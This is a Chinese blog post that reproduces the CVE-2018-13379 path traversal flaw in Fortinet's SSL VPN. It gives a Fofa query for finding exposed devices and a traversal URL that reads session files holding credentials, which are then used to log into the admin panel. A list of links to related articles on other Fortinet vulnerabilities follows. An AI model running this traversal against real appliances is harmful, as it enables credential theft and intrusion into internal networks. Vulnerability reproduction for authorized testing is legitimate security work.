Fortigate SSL VPN路径遍历漏洞（CVE-2018-13379）

最新推荐文章于 2025-01-17 11:24:30 发布

小胡yhu

最新推荐文章于 2025-01-17 11:24:30 发布

阅读量1.4k

点赞数

分类专栏：漏洞复现文章标签： ssl 网络安全

本文链接：https://blog.youkuaiyun.com/weixin_44304678/article/details/134247749

版权

漏洞复现专栏收录该内容

19 篇文章

订阅专栏

Fortigate SSL VPN路径遍历漏洞（CVE-2018-13379）

免责声明
漏洞描述
漏洞影响
漏洞危害
网络测绘
- Fofa: body="FortiToken clock drift detected"
漏洞复现

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

漏洞源于该系统未能正确地过滤资源或文件路径中的特殊元素，导致攻击者可以利用该漏洞访问受限目录以外的位置。

漏洞影响

Fortinet FortiOS 5.6.3版本至5.6.7版本、6.0.0版本至6.0.4版本中的SSL VPN 受此漏洞影响。

漏洞危害

获取敏感信息，造成数据泄露，并且可获取账户密码直通内网

网络测绘

Fofa: body=“FortiToken clock drift detected”

漏洞复现

1. 访问链接查看是否存在漏洞

/remote/fgt_lang?lang=/../../../..//dev/cmdb/sslvpn_websession

2. 查看用户名密码

在这里插入图片描述

3. 登录后台

在这里插入图片描述

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

小胡yhu

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

飞塔CVE-2022-40684复现

G3et的博客

04-22

779

admin 无密码直接回车（会提示修改密码）

【漏洞复现】某厂商明御安全网关sslvpn命令执行漏洞

晚风不及你

03-02

1986

明御安全网关是杭州安恒信息技术股份有限公司研发的一款智慧化安全网关产品。这款产品秉持安全可视、简单有效的理念，以资产为视角，构建了全流程防御的下一代安全防护体系。

参与评论您还未登录，请先登录后发表或查看评论

Fortinet 修复 Fortigate SSL-VPN 设备中严重的 RCE 漏洞

smellycat000的专栏

06-12

1242

【漏洞预警】FortiOS 和 FortiProxy 身份认证绕过漏洞(CVE-2024-55591)

李火火的安全圈

01-17

2167

2025年1月14日，Fortinet 发布安全公告（FG-IR-24-535）称修复了一个可导致FortiOS 和 FortiProxy身份验证绕过的高危漏洞：CVE-2024-55591。攻击者可无需身份认证通过向 Node.js websocket 模块发送特制请求，最终获取设备的超级管理员权限。

Fortinet FortiOS 路径遍历漏洞(CVE-2018-13379）

mei_13的博客

07-08

4551

1 漏洞简介早在2019年5月24日，飞塔官方就发布了CVE-2018-13379漏洞的安全公告，但直到8月份才有漏洞Exp流出，导致漏洞蔓延。据官方介绍，CVE-2018-13379是SSL VPN中的一个目录遍历漏洞，该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素，导致攻击者可利用该漏洞访问受限目录之外的文件。受影响的版本： FortiOS/5.6.3 ~ 5.6.7、FortiOS/6.0.0 ~ 6.0.4 2 环境搭建使用FOFA中搜索飞塔SSL VPN服务器，

Fortinet FortiOS路径遍历漏洞 CVE-2018-13379

limb0的博客

11-09

6423

Fortinet FortiOS路径遍历漏洞 CVE-2018-13379 一、漏洞介绍 Fortinet FortiOS是美国飞塔（Fortinet）公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、VPN、Web内容过滤和反垃圾邮件等多种安全功能。在2019年blackhat上，安全研究人员公布了Fortinet FortiOS多个漏洞，包括For...

CVE-2023-27997漏洞检测工具：高效、安全的FortiGate SSL VPN漏洞评估

gitblog_00944的博客

09-16

1750

CVE-2023-27997漏洞检测工具：高效、安全的FortiGate SSL VPN漏洞评估 CVE-2023-27997-check Safely detect whether a FortiGate SSL VPN instance is vulnerable to CVE-2023-27997 based on...

FortiGate7.4.0 CVE-2024-23113漏洞复现与分析笔记

weixin_51339377的博客

12-02

1690

给予调试启发以及固件文件提取启发的参考地址。

最新系统漏洞--Fortinet FortiGate跨站脚本漏洞

weixin_48555088的博客

10-23

1371

CVE-2018-13382 环境搭建+漏洞复现

yxngu

07-30

1760

芝兰生于深山，不以无人而不芳

「安全狗漏洞通告」Fortinet SSL VPN远程代码执行漏洞解决方案

bocco的博客

12-14

1785

安全狗应急响应中心监测到，Fortinet发布了FortiOS SSL-VPN的风险通告，漏洞等级：高危，漏洞评分：9.3。漏洞编号：CVE-2022-42475。

CVE-2018-13379 环境搭建+漏洞复现

yxngu

07-29

7521

正入万山圈子里，一山放过一山拦。

网络靶场实战--飞塔(Fortinet)防火墙认证绕过漏洞(CVE-2022-40684)

蛇矛实验室

12-13

6497

我们这一小节简单了解了身份认证绕过流程，分析并复现了fortigate防火墙身份认证绕过漏洞的形成过程以及如何利用。蛇矛实验室成立于2020年，致力于安全研究、攻防解决方案、靶场对标场景仿真复现及技战法设计与输出等相关方向。团队核心成员均由从事安全行业10余年经验的安全专家组成，团队目前成员涉及红蓝对抗、渗透测试、逆向破解、病毒分析、工控安全以及免杀等相关领域。

Ruijie SSL V P N 垂直越权漏洞

土豆的博客

03-08

4442

【漏洞复现】Ruijie SSL V P N 垂直越权漏洞目录【漏洞复现】Ruijie SSL VPN 垂直越权漏洞 1、漏洞简介 2、漏洞影响 3、漏洞复现 4、漏洞批量检测 5、漏洞修复 1、漏洞简介 Ruijie SSL VPN 垂直越权漏洞，攻击者在已知用户名的情况下(默认adm，未知可Burp进行爆破)，查看服务器资源，以及对账号进行修改密码和绑定手机操作。 2、漏洞影响 Ruijie SSL VPN 3、漏洞复现 3.1先通过Fofa等方...

CVE-2022-40684 Fortinet（飞塔）身份验证绕过漏洞

江左盟的博客

10-31

6662

FortiSwitchManager产品的管理界面中，可以通过使用备用路径或通道绕过身份验证，并在未经认证的情况下通过特制的HTTP或HTTPS请求对管理界面进行操作。

教程篇(7.4) 10. SSL VPN & FortiGate管理员 ❀ Fortinet网络安全专家 NSE4

防火墙技术专栏

03-28

3857

在本课中，你将学习如何配置和使用SSL VPN。SSL VPN是让远程用户访问你的私人网络的简单方法。

漏洞预警丨Fortinet FortiOS & FortiProxy越界写入漏洞（CVE-2024-21762）

C20220511的博客

03-18

1701

Fortinet FortiOS是美国飞塔（Fortinet）公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。在SSL VPN组件中存在越界写入漏洞，可能导致未经身份验证的远程威胁者通过特制HTTP请求执行任意命令或代码。daydaypoc漏洞平台于2024年3月12日已收录该漏洞。越界写入/远程命令执行。

cve-2025-0411